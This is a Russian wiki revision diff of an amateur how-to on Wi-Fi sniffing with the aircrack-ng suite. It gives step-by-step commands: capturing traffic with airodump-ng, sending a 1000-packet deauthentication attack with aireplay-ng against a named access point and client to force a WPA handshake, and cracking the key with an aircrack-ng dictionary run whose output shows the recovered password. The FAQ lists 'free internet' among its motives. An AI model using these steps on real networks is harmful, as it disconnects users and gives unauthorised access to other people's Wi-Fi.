Различия
Здесь показаны различия между двумя версиями данной страницы.
| Следующая версия | Предыдущая версия | ||
|
wiki:wi-fi_sniffing [2012/10/04 19:00] создано - пилится, в процессе |
wiki:wi-fi_sniffing [2014/10/05 21:13] (текущий) [airodump-ng] Не были закрыты одинарные кавычки. Надо открывать и закрывать их. Такке эмпирическим путём было установлено что можно вообще их не использовать. Также можно не вводить полный путь к папке, а использовать сокращение ~/snif, в таком случае ком |
||
|---|---|---|---|
| Строка 3: | Строка 3: | ||
| <note tip>Статья не закончена </note> | <note tip>Статья не закончена </note> | ||
| - | FAQ: | + | FAQ: <code> |
| В:Что такое sniffing? | В:Что такое sniffing? | ||
| О:"Прослушивание" канала и отлавливание пакетов их сети. | О:"Прослушивание" канала и отлавливание пакетов их сети. | ||
| Строка 9: | Строка 9: | ||
| В:Зачем это? | В:Зачем это? | ||
| O:Для опыта, развлечения, бесплатного интернета, драйва, много зачем, я думаю если бы у вас не было причин, вы бы не читали этого. | O:Для опыта, развлечения, бесплатного интернета, драйва, много зачем, я думаю если бы у вас не было причин, вы бы не читали этого. | ||
| + | </code> | ||
| **Немного теории** | **Немного теории** | ||
| //Я не буду заново изобретать велосипед, статей на эту тему масса, но для меня они были не удовлетворительные и непонятными, потому пишу свой вариант с пояснениями и дословным How-To, буду рад дополнениям и поправкам, так как пишу на основе своих знаний и без большой компетентности и опыта в вопросе// | //Я не буду заново изобретать велосипед, статей на эту тему масса, но для меня они были не удовлетворительные и непонятными, потому пишу свой вариант с пояснениями и дословным How-To, буду рад дополнениям и поправкам, так как пишу на основе своих знаний и без большой компетентности и опыта в вопросе// | ||
| Строка 51: | Строка 51: | ||
| Если мы хотим дальше использовать aircrack-ng то нужно запускать airodump-ng с ключами для вывода файлов. | Если мы хотим дальше использовать aircrack-ng то нужно запускать airodump-ng с ключами для вывода файлов. | ||
| mkdir snif | mkdir snif | ||
| - | airodump-ng -w '/home/timofey/snif/ mon0 | + | airodump-ng -w '~/snif/' mon0 |
| + | или | ||
| + | airodump-ng -w ~/snif/ mon0 | ||
| где -w ключ для вывода, а дальше путь куда будут сохраняться файлы прослушивания. {{ :wiki:выделение_004.png?500|}} | где -w ключ для вывода, а дальше путь куда будут сохраняться файлы прослушивания. {{ :wiki:выделение_004.png?500|}} | ||
| ещё есть ключ --channel после которого пишется номер нужного канала, использовать только при надобности, например если aireplay-ng не хочет корректно работать из-за того что не может переключится на нужный канал. | ещё есть ключ --channel после которого пишется номер нужного канала, использовать только при надобности, например если aireplay-ng не хочет корректно работать из-за того что не может переключится на нужный канал. | ||
| Строка 65: | Строка 67: | ||
| C8:64:C7:53:02:0C - нужная нам точка доступа. | C8:64:C7:53:02:0C - нужная нам точка доступа. | ||
| Собственно всё что нас интересует. | Собственно всё что нас интересует. | ||
| - | ====aireplay==== | + | ====aireplay-ng==== |
| + | Пакет для хуков, в данном случае он нам понадобится для получения среди пакетов ключей ауентификации. | ||
| + | Создаём новое окно терминала, получаем права суперпользователя и вбиваем | ||
| + | aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c 18:F4:6A:9B:BF:59 mon0 | ||
| + | где -0 режим атаки - деаунтефикация. | ||
| + | -а атакуемая точка. | ||
| + | -с клиент который потеряет сеть. | ||
| + | 1000 количество попыток (с какой то попытки человек вылетит из сети насовсем и 100% передаст заново ключи ауентификации) | ||
| + | На практике доказано, что хватает 20-30 пакетов чтобы выбить человека из сети, а 1000 садизм. | ||
| + | Видим в мониторе как у клиента растут переданные пакеты, отлично теперь переходим к заключительной части. | ||
| + | Для всяких извращений курим help | ||
| + | aireplay-ng --help | ||
| + | ====aircrack-ng==== | ||
| + | Теперь заключительная часть, у нас куча данных переданных по сети, огромное количество пакетов (чем больше, тем больше шансов выловить что-то полезное). | ||
| + | aircrack-ng -a 2 -e 'by Inri' -w '/home/timofey/words/my1.txt' '/home/timofey/snif/Inri-02.cap' | ||
| + | Где -a тип ключа 1|WEP 2|WPA/WPA2 | ||
| + | -e название сети | ||
| + | -w путь к файлу с словарём *читал что можно написать *** для того чтобы использовать все доступные словари и прослушанные данные, но не выходит, пишет ошибку. | ||
| + | А последнее путь к файлу с прослушанными пакетами. | ||
| + | Вывод, с 4 попытки подобрал (повторяюсь ключ был известен и вписан в словарь для скорости и 100% вероятности перебора). | ||
| + | <code> | ||
| + | Aircrack-ng 1.1 | ||
| + | |||
| + | |||
| + | [00:00:00] 4 keys tested (415.33 k/s) | ||
| + | |||
| + | |||
| + | KEY FOUND! [ GoodOmens ] | ||
| + | |||
| + | |||
| + | Master Key : CE 25 4A B0 41 BE 0F 4F E4 01 68 AB 07 69 B2 71 | ||
| + | 11 20 52 86 63 BA 4E 17 97 B4 8E 84 69 68 34 0D | ||
| + | |||
| + | Transient Key : 58 40 8D E3 D7 8E A8 DA 89 BC 44 39 37 02 D1 C4 | ||
| + | 16 99 AC C3 93 3E DF 52 AC C4 3E C5 DF C3 CD DF | ||
| + | 7B 6F C8 3E E8 B0 F8 AA 16 C1 0C 69 2F 94 47 3A | ||
| + | 1B 90 EF 22 59 60 34 B2 96 11 A5 FB 5B F7 21 F2 | ||
| + | |||
| + | EAPOL HMAC : DA C6 09 55 6D E8 0E D0 97 25 96 F6 F7 53 D7 7F | ||
| + | </code> | ||
| ===== Ссылки ===== | ===== Ссылки ===== | ||
| * [[FIXME]] | * [[FIXME]] | ||
| - | {{tag>wi-fi_sniffing}} | + | {{tag>wi-fi sniffing aircrack-ng}} |
| + | |||
| + | --- [[user>nefelim4ag]] //2012/10/04 19:50// | ||
